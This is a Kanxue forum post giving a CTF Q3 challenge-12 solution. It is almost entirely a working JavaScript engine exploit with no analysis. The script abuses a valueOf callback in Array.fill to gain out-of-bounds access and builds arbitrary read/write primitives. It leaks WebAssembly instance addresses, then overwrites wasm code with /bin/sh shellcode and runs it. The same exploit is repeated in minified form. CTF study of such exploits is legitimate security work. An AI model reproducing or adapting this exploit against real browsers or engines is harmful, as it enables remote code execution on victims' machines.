首页
论坛
专栏
课程

[原创] 看雪 ctf q3 第十二题:精忠报国

2019-9-12 04:55 240

[原创] 看雪 ctf q3 第十二题:精忠报国

aqs
5
2019-9-12 04:55
240

膜2019师傅

 

也不知道自己思路对不对反正就是getshell了...等writeup

 

木有什么时间先贴下代码,以后会加上分析的(嗯,会加上的)

var buf =new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);

function f2i(f)
{
    float64[0] = f;
    return bigUint64[0];
}
function i2f(i)
{
    bigUint64[0] = i;
    return float64[0];
}
function hex(i)
{
    return i.toString(16).padStart(16, "0");
}

var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
var shellcode = [
    0x2fbb485299583b6an,
    0x5368732f6e69622fn,
    0x050f5e5457525f54n
];

a=[1.1,2.2,3.3];
b=[];
c=[];

a.length=0x100;

a.fill(1.1,14,{valueOf(){
    a.length=0x2;
    a.fill(f);
    c=[1.1,2.2,3.2];
    b=[f];
    return 15;
}});

doublemap = c[3];
wasm_base = f2i(c[9])-1n;

function element_to(addr){
    c[10]=doublemap;
    c[12]=i2f(addr);
}
// leak wasm base
element_to(wasm_base+8n+1n);
shareleak = f2i(b[0]);

element_to(shareleak-8n);
dataleak = f2i(b[0]);

element_to(dataleak);
instanceleak = f2i(b[0]);

element_to(instanceleak+0x70n);
wasmleak = f2i(b[0]);

// overwrite to shellcode
element_to(wasmleak+0x231n);
b[0]=i2f(shellcode[0]);

element_to(wasmleak+0x231n+0x8n);
b[0]=i2f(shellcode[1]);

element_to(wasmleak+0x231n+0x10n);
b[0]=i2f(shellcode[2]);
f();

压缩网站 https://www.html.cn/tool/ysjs/

 

压缩后

var buf=new ArrayBuffer(16);var float64=new Float64Array(buf);var bigUint64=new BigUint64Array(buf);function f2i(f){float64[0]=f;return bigUint64[0];}function i2f(i){bigUint64[0]=i;return float64[0];}function hex(i){return i.toString(16).padStart(16,"0");}var wasmCode=new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);var wasmModule=new WebAssembly.Module(wasmCode);var wasmInstance=new WebAssembly.Instance(wasmModule,{});var f=wasmInstance.exports.main;var shellcode=[0x2fbb485299583b6an,0x5368732f6e69622fn,0x050f5e5457525f54n];a=[1.1,2.2,3.3];b=[];c=[];a.length=0x100;a.fill(1.1,14,{valueOf(){a.length=0x2;a.fill(f);c=[1.1,2.2,3.2];b=[f];return 15;}});doublemap=c[3];wasm_base=f2i(c[9])-1n;function element_to(addr){c[10]=doublemap;c[12]=i2f(addr);}element_to(wasm_base+8n+1n);shareleak=f2i(b[0]);element_to(shareleak-8n);dataleak=f2i(b[0]);element_to(dataleak);instanceleak=f2i(b[0]);element_to(instanceleak+0x70n);wasmleak=f2i(b[0]);element_to(wasmleak+0x231n);b[0]=i2f(shellcode[0]);element_to(wasmleak+0x231n+0x8n);b[0]=i2f(shellcode[1]);element_to(wasmleak+0x231n+0x10n);b[0]=i2f(shellcode[2]);f();


[公告]安全测试和项目外包请将项目需求发到看雪企服平台:https://qifu.kanxue.com

上传的附件:
最新回复 (0)
游客
登录 | 注册 方可回帖
返回